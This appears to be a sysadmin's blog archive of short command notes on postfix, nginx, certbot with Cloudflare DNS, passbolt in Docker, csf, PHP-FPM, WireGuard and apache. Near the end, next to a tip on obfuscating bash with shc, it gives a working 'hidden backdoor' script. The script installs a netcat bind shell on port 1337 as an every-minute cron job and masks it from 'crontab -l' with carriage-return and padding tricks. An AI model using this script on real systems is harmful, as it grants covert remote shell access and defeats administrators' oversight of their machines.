Should not be full math:
vi /etc/postfix/main.cf
smtpd_sasl_path = private/auth-client
fatal: no SASL authentication mechanisms
Leave a reply
Monthly Archives: February 2021
Server Error! (Request Entity Too Large)
vim /etc/nginx/nginx.conf
client_max_body_size 100m;
client_body_timeout 120s;
snap certbot dns-cloudflare
apt update
apt install snapd
snap install core; snap refresh core
apt-get remove certbot
snap install --classic certbot
ln -s /snap/bin/certbot /usr/bin/certbot
snap set certbot trust-plugin-with-root=ok
snap install --beta certbot-dns-cloudflare
snap connect certbot:plugin certbot-dns-cloudflare
vim ~/.secrets/certbot/cloudflare.ini
dns_cloudflare_api_token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
certbot certonly \
--dns-cloudflare \
--dns-cloudflare-credentials ~/.secrets/certbot/cloudflare.ini \
-d srv24x7.com \
-d *.srv24x7.com
passbolt docker password manager
docker pull passbolt/passbolt:latest
git clone https://github.com/passbolt/passbolt_docker
cd passbolt_docker
vim env/mysql.env
vim env/passbolt.env
docker-compose -f docker-compose.yml up -d
docker-compose ps
docker-compose exec passbolt su -m -c "/var/www/passbolt/bin/cake \
passbolt register_user \
-u <[email protected]> \
-f <yourname> \
-l <surname> \
-r admin" -s /bin/sh www-data
Another option manually run passbolt:
docker network create passbolt_network
docker volume create mariadb_passbolt_data
docker run -d --name mariadb --net passbolt_network \
--mount source=mariadb_passbolt_data,target=/var/lib/mysql \
-e MYSQL_ROOT_PASSWORD=<root_password> \
-e MYSQL_DATABASE=<mariadb_database> \
-e MYSQL_USER=<mariadb_user> \
-e MYSQL_PASSWORD=<mariadb_password> \
mariadb
docker run --name passbolt --net passbolt_network \
--mount type=bind,\
source=<host_path_to_gnupg_keys_dir>,\
target=/var/www/passbolt/config/gpg \
-p 443:443 \
-p 80:80 \
-e DATASOURCES_DEFAULT_HOST=mariadb \
-e DATASOURCES_DEFAULT_PASSWORD=<mariadb_password> \
-e DATASOURCES_DEFAULT_USERNAME=<mariadb_user> \
-e DATASOURCES_DEFAULT_DATABASE=<mariadb_database> \
-e APP_FULL_BASE_URL=https://mydomain.com \
passbolt/passbolt:latest
Persisting data in passbolt container:
/var/www/passbolt/webroot/img
/var/www/passbolt/config/gpg
/etc/ssl/certs/certificate.crt /etc/ssl/certs/certificate.key
Persisting the images directory could be to create a docker volume:
docker volume create passbolt_images
docker run --name passbolt --net passbolt_network \
--mount source=passbolt_images,\
target=/var/www/passbolt/webroot/img \
-p 443:443 \
-p 80:80 \
-e DATASOURCES_DEFAULT_HOST=mariadb \
-e DATASOURCES_DEFAULT_PASSWORD=<mariadb_password> \
-e DATASOURCES_DEFAULT_USERNAME=<mariadb_user> \
-e DATASOURCES_DEFAULT_DATABASE=<mariadb_database> \
-e APP_FULL_BASE_URL=https://mydomain.com \
passbolt/passbolt:latest
certbot renew certificate
certbot renew --cert-name srv24x7.com
certbot renew --force-renewal --cert-name srv24x7.com
Failed opening /var/log/syslog: open /var/log/syslog: too many open files
vi /etc/security/limits.conf
* - nofile 524288
csf allow ssh specific IP
vi /etc/csf/csf.allow
192.168.100.100
vi /etc/csf/csf.conf
TCP_IN section remove your SSH port
or
vi /etc/csf/csf.conf
tcp|in|d=22|s=192.168.100.100
csf -ra
SSLCertificateFile: file ‘/etc/pki/tls/certs/localhost.crt’ does not exist or is empty
/usr/libexec/httpd-ssl-gencerts
PHP-FPM get status
cat /etc/php/7.4/fpm/pool.d/www.conf | grep -v \; | awk 'NF' | tee /etc/php/7.4/fpm/pool.d/www.conf
vi /etc/php/7.4/fpm/pool.d/www.conf
pm.status_path=/status
ping.path=/ping
ping.response=pong
apt install fcgiwrap
ss -l | grep php
u_strLISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0
SCRIPT_NAME=/status \
SCRIPT_FILENAME=/status \
REQUEST_METHOD=GET \
cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8
pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0
wireguard setup
add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard
MacOS
brew install wireguard-tools
wg genkey | tee privatekey | wg pubkey > publickey
Server side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE
[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32
[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32
[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32
[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32
Client side:
/etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]
[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0
# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25
Start/stop interface
wg-quick up wg0
wg-quick down wg0
Start/stop service
$ sudo systemctl stop [email protected]
$ sudo systemctl start [email protected]
Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:
# add peer
wg set wg0 peer
# verify connection
wg
# save to config
wg-quick save wg0
proxy_fcgi apache
apt install apache2 php7.4-fpm
a2enconf php7.4-fpm
a2enmod proxy proxy_fcgi
cat /etc/apache2/conf-enabled/php7.4-fpm.conf
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
<IfModule proxy_fcgi_module>
# Enable http authorization headers
<IfModule setenvif_module>
SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
</IfModule>
<FilesMatch ".+\.ph(ar|p|tml)$">
SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
</FilesMatch>
<FilesMatch ".+\.phps$">
# Deny access to raw php sources by default
# To re-enable it's recommended to enable access to the files
# only in specific virtual host or directory
Require all denied
</FilesMatch>
# Deny access to files without filename (e.g. '.php')
<FilesMatch "^\.ph(ar|p|ps|tml)$">
Require all denied
</FilesMatch>
</IfModule>
</IfModule>
proxy_fcgi:error AH01071: Got error Primary script unknown
File not found.
This error message means there are no such file.
encrypt bash
hide bash code using c:
apt install shc
shc -f mybash.sh
hide cron
printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit
Hidden backdoor:
BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"
# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"
# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do
FIRST_TASK="${FIRST_TASK} "; ((i++))
done
fi
# carriage return goes there ("\r")
printf "${HIDDEN};\r${FIRST_TASK}\n"; cat
} | crontab -
if [ $? -eq 0 ]; then
echo "Backdoor is now hidden in cron table"
echo "Shell will be bind on port ${BDOOR_PT}."
else
echo "Failed."
fi
nginx log response time
vi /etc/nginx/nginx.conf
log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';
access_log /var/log/nginx/srv24x7.com.access.log timed_combined;